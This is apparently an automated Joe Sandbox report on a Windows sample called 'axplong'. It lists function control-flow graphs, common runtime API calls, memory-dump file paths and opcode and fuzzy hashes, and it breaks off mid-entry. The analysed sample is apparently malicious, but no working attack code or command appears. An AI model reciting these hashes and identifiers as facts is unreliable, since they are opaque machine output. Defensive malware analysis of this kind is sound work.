                                                                    • Not Executed
                                                                    control_flow_graph 1181 907870-907894 1182 907896 1181->1182 1183 907898-90789b 1181->1183 1182->1183 1184 9078b9-9078d0 1183->1184 1185 90789d-9078b6 1183->1185 1186 9078f1-9078f3 1184->1186 1187 9078d2-9078d7 1184->1187 1190 907902 1186->1190 1191 9078f5-9078f6 call 90d312 1186->1191 1188 907929 call 8f2440 1187->1188 1189 9078d9-9078e4 call 90d312 1187->1189 1198 90792e-907950 call 926b9a 1188->1198 1189->1198 1202 9078e6-9078ef 1189->1202 1193 907904-907926 call 923aa0 1190->1193 1196 9078fb-907900 1191->1196 1196->1193 1204 907952-907956 1198->1204 1205 907964-907986 call 90bc5a call 90c591 call 90b4f7 1198->1205 1202->1193 1204->1205 1207 907958-907961 call 90b936 1204->1207 1215 907993-907997 1205->1215 1216 907988-907990 call 90d593 1205->1216 1207->1205 1216->1215
                                                                    APIs
                                                                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0090795C
                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00907968
                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00907971
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                    • String ID:
                                                                    • API String ID: 4078500453-0
                                                                    • Opcode ID: 4b76d14983b09e25be49b2148554f8dff1441acfb0cc5511829b1c0a2e40eddb
                                                                    • Instruction ID: c78edf0d668a1f1707779736202bc237157809bece9b8a2d28d8fffedfca053c
                                                                    • Opcode Fuzzy Hash: 4b76d14983b09e25be49b2148554f8dff1441acfb0cc5511829b1c0a2e40eddb
                                                                    • Instruction Fuzzy Hash: 0F31D2B29047059FD720DFA8D845B6AF7ECEF54320F000A2AE955C7681E771FA5487A1
                                                                    Function 0092D4F4 Relevance: 1.7, APIs: 1, Instructions: 198COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1350 92d4f4-92d515 call 90deb0 1353 92d517 1350->1353 1354 92d52f-92d532 1350->1354 1355 92d519-92d51f 1353->1355 1356 92d54e-92d55a call 92a688 1353->1356 1354->1356 1357 92d534-92d537 1354->1357 1358 92d543-92d54c call 92d43c 1355->1358 1359 92d521-92d525 1355->1359 1370 92d564-92d570 call 92d47e 1356->1370 1371 92d55c-92d55f 1356->1371 1357->1358 1360 92d539-92d53c 1357->1360 1374 92d58c-92d595 1358->1374 1359->1356 1362 92d527-92d52b 1359->1362 1363 92d572-92d582 call 927443 call 926b8a 1360->1363 1364 92d53e-92d541 1360->1364 1362->1363 1367 92d52d 1362->1367 1363->1371 1364->1358 1364->1363 1367->1358 1370->1363 1380 92d584-92d589 1370->1380 1375 92d6cb-92d6da 1371->1375 1378 92d5a2-92d5b3 1374->1378 1379 92d597-92d59f call 928c8b 1374->1379 1383 92d5b5-92d5c7 1378->1383 1384 92d5c9 1378->1384 1379->1378 1380->1374 1386 92d5cb-92d5dc 1383->1386 1384->1386 1387 92d64a-92d65a call 92d687 1386->1387 1388 92d5de-92d5e0 1386->1388 1397 92d6c9 1387->1397 1398 92d65c-92d65e 1387->1398 1390 92d5e6-92d5e8 1388->1390 1391 92d6db-92d6dd 1388->1391 1393 92d5f4-92d600 1390->1393 1394 92d5ea-92d5ed 1390->1394 1395 92d6e7-92d6fa call 92651d 1391->1395 1396 92d6df-92d6e6 call 928cd3 1391->1396 1400 92d602-92d617 call 92d4eb * 2 1393->1400 1401 92d640-92d648 1393->1401 1394->1393 1399 92d5ef-92d5f2 1394->1399 1418 92d708-92d70e 1395->1418 1419 92d6fc-92d706 1395->1419 1396->1395 1397->1375 1404 92d660-92d676 call 92a531 1398->1404 1405 92d699-92d6a2 1398->1405 1399->1393 1406 92d61a-92d61c 1399->1406 1400->1406 1401->1387 1429 92d6a5-92d6a8 1404->1429 1405->1429 1406->1401 1412 92d61e-92d62e 1406->1412 1417 92d630-92d635 1412->1417 1417->1387 1424 92d637-92d63e 1417->1424 1421 92d710-92d711 1418->1421 1422 92d727-92d738 RtlAllocateHeap 1418->1422 1419->1418 1420 92d73c-92d747 call 927443 1419->1420 1430 92d749-92d74b 1420->1430 1421->1422 1425 92d713-92d71a call 929c81 1422->1425 1426 92d73a 1422->1426 1424->1417 1425->1420 1440 92d71c-92d725 call 928cf9 1425->1440 1426->1430 1433 92d6b4-92d6bc 1429->1433 1434 92d6aa-92d6ad 1429->1434 1433->1397 1436 92d6be-92d6c6 call 92a531 1433->1436 1434->1433 1435 92d6af-92d6b2 1434->1435 1435->1397 1435->1433 1436->1397 1440->1420 1440->1422
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05491c0d858248bfc0a53133a9a85c5623af4305ed80757a5d429151a4f59f2a
                                                                    • Instruction ID: 743d630e1eeefd5c370988ced7939f0be65da4847e57d8720250e46e530cc70a
                                                                    • Opcode Fuzzy Hash: 05491c0d858248bfc0a53133a9a85c5623af4305ed80757a5d429151a4f59f2a
                                                                    • Instruction Fuzzy Hash: DA612672D062348FDF21EFA8F884BEDB7A8AF95314F244015E444A729CC7718C048B91
                                                                    Function 008F82B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1444 8f82b0-8f8331 call 924020 1448 8f833d-8f8365 call 907870 call 8f5b20 1444->1448 1449 8f8333-8f8338 1444->1449 1457 8f8369-8f838b call 907870 call 8f5b20 1448->1457 1458 8f8367 1448->1458 1450 8f847f-8f849b call 90cf21 1449->1450 1463 8f838f-8f83a8 1457->1463 1464 8f838d 1457->1464 1458->1457 1467 8f83aa-8f83b9 1463->1467 1468 8f83d9-8f8404 1463->1468 1464->1463 1469 8f83cf-8f83d6 call 90d593 1467->1469 1470 8f83bb-8f83c9 1467->1470 1471 8f8406-8f8415 1468->1471 1472 8f8431-8f8452 1468->1472 1469->1468 1470->1469 1475 8f849c-8f84a1 call 926b9a 1470->1475 1477 8f8427-8f842e call 90d593 1471->1477 1478 8f8417-8f8425 1471->1478 1473 8f8458-8f845d 1472->1473 1474 8f8454-8f8456 GetNativeSystemInfo 1472->1474 1479 8f845e-8f8465 1473->1479 1474->1479 1477->1472 1478->1475 1478->1477 1479->1450 1484 8f8467-8f846f 1479->1484 1487 8f8478-8f847b 1484->1487 1488 8f8471-8f8476 1484->1488 1487->1450 1489 8f847d 1487->1489 1488->1450 1489->1450
                                                                    APIs
                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 008F8454
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoNativeSystem
                                                                    • String ID:
                                                                    • API String ID: 1721193555-0
                                                                    • Opcode ID: fc6be6d5adc3767f7a94c7bda99ff293e66ab4034fc916091125e559a9adbf2f
                                                                    • Instruction ID: 11a3b13d6bf5fc9f7d4411aab0d9d5adb2e2c068aaa846b6908da8bf6a110896
                                                                    • Opcode Fuzzy Hash: fc6be6d5adc3767f7a94c7bda99ff293e66ab4034fc916091125e559a9adbf2f
                                                                    • Instruction Fuzzy Hash: F551157190021CDBDB24EB78CD49BEDB775EB56314F504298E904E73D1EB309A848BA5
                                                                    Function 00926C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1490 926c99-926ca5 1491 926ca7-926cc3 call 927430 call 927443 call 926b8a 1490->1491 1492 926cc4-926ce8 call 924020 1490->1492 1497 926d06-926d28 CreateFileW 1492->1497 1498 926cea-926d04 call 927430 call 927443 call 926b8a 1492->1498 1502 926d2a-926d2e call 926e01 1497->1502 1503 926d38-926d3f call 926d77 1497->1503 1522 926d72-926d76 1498->1522 1508 926d33-926d36 1502->1508 1512 926d40-926d42 1503->1512 1508->1512 1514 926d64-926d67 1512->1514 1515 926d44-926d61 call 924020 1512->1515 1518 926d70 1514->1518 1519 926d69-926d6f 1514->1519 1515->1514 1518->1522 1519->1518
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd84a900e14171b8728d4a3bb65b15b809a55f7157b0434924b50d7d1bf5603f
                                                                    • Instruction ID: 0907087326920c88d2fd07707fc23e510902d969642de8b58b46db9ae8ea0322
                                                                    • Opcode Fuzzy Hash: fd84a900e14171b8728d4a3bb65b15b809a55f7157b0434924b50d7d1bf5603f
                                                                    • Instruction Fuzzy Hash: DC210A72A052287AEB11BBA4BC42F9F772D9F82338F204310F9243B1D5DB705E0596A1
                                                                    Function 00926F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1524 926f71-926f87 1525 926f97-926fa7 1524->1525 1526 926f89-926f8d 1524->1526 1531 926fe7-926fea 1525->1531 1532 926fa9-926fbb SystemTimeToTzSpecificLocalTime 1525->1532 1526->1525 1527 926f8f-926f95 1526->1527 1528 926fec-926ff7 call 90cf21 1527->1528 1531->1528 1532->1531 1534 926fbd-926fdd call 926ff8 1532->1534 1536 926fe2-926fe5 1534->1536 1536->1528
                                                                    APIs
                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00926FB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$LocalSpecificSystem
                                                                    • String ID:
                                                                    • API String ID: 2574697306-0
                                                                    • Opcode ID: 483e2c8f92b300a460a1bb2d7ddbb88f9e233f6a0c33ce7c1a7c72f1052d6867
                                                                    • Instruction ID: b7624319a950309b86122b7764b4267df0669295bc62806446ae4cdc12d63a22
                                                                    • Opcode Fuzzy Hash: 483e2c8f92b300a460a1bb2d7ddbb88f9e233f6a0c33ce7c1a7c72f1052d6867
                                                                    • Instruction Fuzzy Hash: 021118B290020CABCF00DEA5E984EDFB7BCAF4C310F604666E515E2180EB30EB44CB61
                                                                    Function 0092D6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1537 92d6ef-92d6fa 1538 92d708-92d70e 1537->1538 1539 92d6fc-92d706 1537->1539 1541 92d710-92d711 1538->1541 1542 92d727-92d738 RtlAllocateHeap 1538->1542 1539->1538 1540 92d73c-92d747 call 927443 1539->1540 1546 92d749-92d74b 1540->1546 1541->1542 1543 92d713-92d71a call 929c81 1542->1543 1544 92d73a 1542->1544 1543->1540 1550 92d71c-92d725 call 928cf9 1543->1550 1544->1546 1550->1540 1550->1542
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0092A5ED,?,009274AE,?,00000000,?), ref: 0092D730
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: f2efee4dd61b768f330819061d6ce4c581cc688b8b395c20cdee85e2e09374a6
                                                                    • Instruction ID: cc5786806b1c7ae84e03e0342d88abf733507a652fd298057554365df65101d5
                                                                    • Opcode Fuzzy Hash: f2efee4dd61b768f330819061d6ce4c581cc688b8b395c20cdee85e2e09374a6
                                                                    • Instruction Fuzzy Hash: 15F0E97164B135669F227A22BC01B5B3B9DAF817B0B184511AC08EA199CF38ED0047E1
                                                                    Function 0092AF0B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1553 92af0b-92af17 1554 92af49-92af54 call 927443 1553->1554 1555 92af19-92af1b 1553->1555 1562 92af56-92af58 1554->1562 1556 92af34-92af45 RtlAllocateHeap 1555->1556 1557 92af1d-92af1e 1555->1557 1560 92af20-92af27 call 929c81 1556->1560 1561 92af47 1556->1561 1557->1556 1560->1554 1565 92af29-92af32 call 928cf9 1560->1565 1561->1562 1565->1554 1565->1556
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,00906B27,?,?,0090D32C,00906B27,?,009078FB,8B18EC84,05280A88), ref: 0092AF3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: c7872a298107b8598f810de7dcae96bfc96ca77e4d934527f6eef2ab800089f4
                                                                    • Instruction ID: dcd8b7dec182752e896b5972a122e031474c06932eb801f694c96d42f8c34591
                                                                    • Opcode Fuzzy Hash: c7872a298107b8598f810de7dcae96bfc96ca77e4d934527f6eef2ab800089f4
                                                                    • Instruction Fuzzy Hash: BBE02B7321A23157EB2132667E00BEB768DAF813B1F040051AD589219CCF2CDC0052E3
                                                                    Function 00906AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a45d64daf01a10eee9d8d285cc9f1f38f12cad2f615b885261e048e7b0337824
                                                                    • Instruction ID: 75a07da6e0233a3af3c05c89d1887db8b75401fc820b232d6181055d253dcef8
                                                                    • Opcode Fuzzy Hash: a45d64daf01a10eee9d8d285cc9f1f38f12cad2f615b885261e048e7b0337824
                                                                    • Instruction Fuzzy Hash: 6DF0D171E14608ABC600BBB99D06B1DBB74EB87760F800358E911672E1DB346A0487E3
                                                                    Function 052F0B7E Relevance: .2, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7d4b43073d1733caa1b52f918e3a8650a92a00cacbdaa50956a6bde2dd3bed12
                                                                    • Instruction ID: dbf59151ef4e8e7461f9a8c47a277fe00e9d701bd896007db7bfb926f53f7498
                                                                    • Opcode Fuzzy Hash: 7d4b43073d1733caa1b52f918e3a8650a92a00cacbdaa50956a6bde2dd3bed12
                                                                    • Instruction Fuzzy Hash: B53189EB17C124BD7151C5427B6CAFBA76EE9C2730330843AFA03C5907E2D90A591231
                                                                    Function 052F0BA7 Relevance: .2, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d49c407991fa48dc7c542a08ae432a426286d0c2009a9840e0075198626869c
                                                                    • Instruction ID: f28474a2e4e3dc6c7db09793d2ac7afbca1fb040e949a6dfdec0d2ef1c21a8ea
                                                                    • Opcode Fuzzy Hash: 4d49c407991fa48dc7c542a08ae432a426286d0c2009a9840e0075198626869c
                                                                    • Instruction Fuzzy Hash: D03189EB53C124BD7052C0417F2CAFAAB6EE9D2734330843AFA07C5903E2D90A591231
                                                                    Function 052F0B69 Relevance: .2, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9a82c6510e645ba9de32dad82060c8581d1a314837da91e94c0b3b22cf1d02c
                                                                    • Instruction ID: 08374664185fa8b7304a784dc416674192dba515425fcba4aa26c2a10f9b5d9a
                                                                    • Opcode Fuzzy Hash: e9a82c6510e645ba9de32dad82060c8581d1a314837da91e94c0b3b22cf1d02c
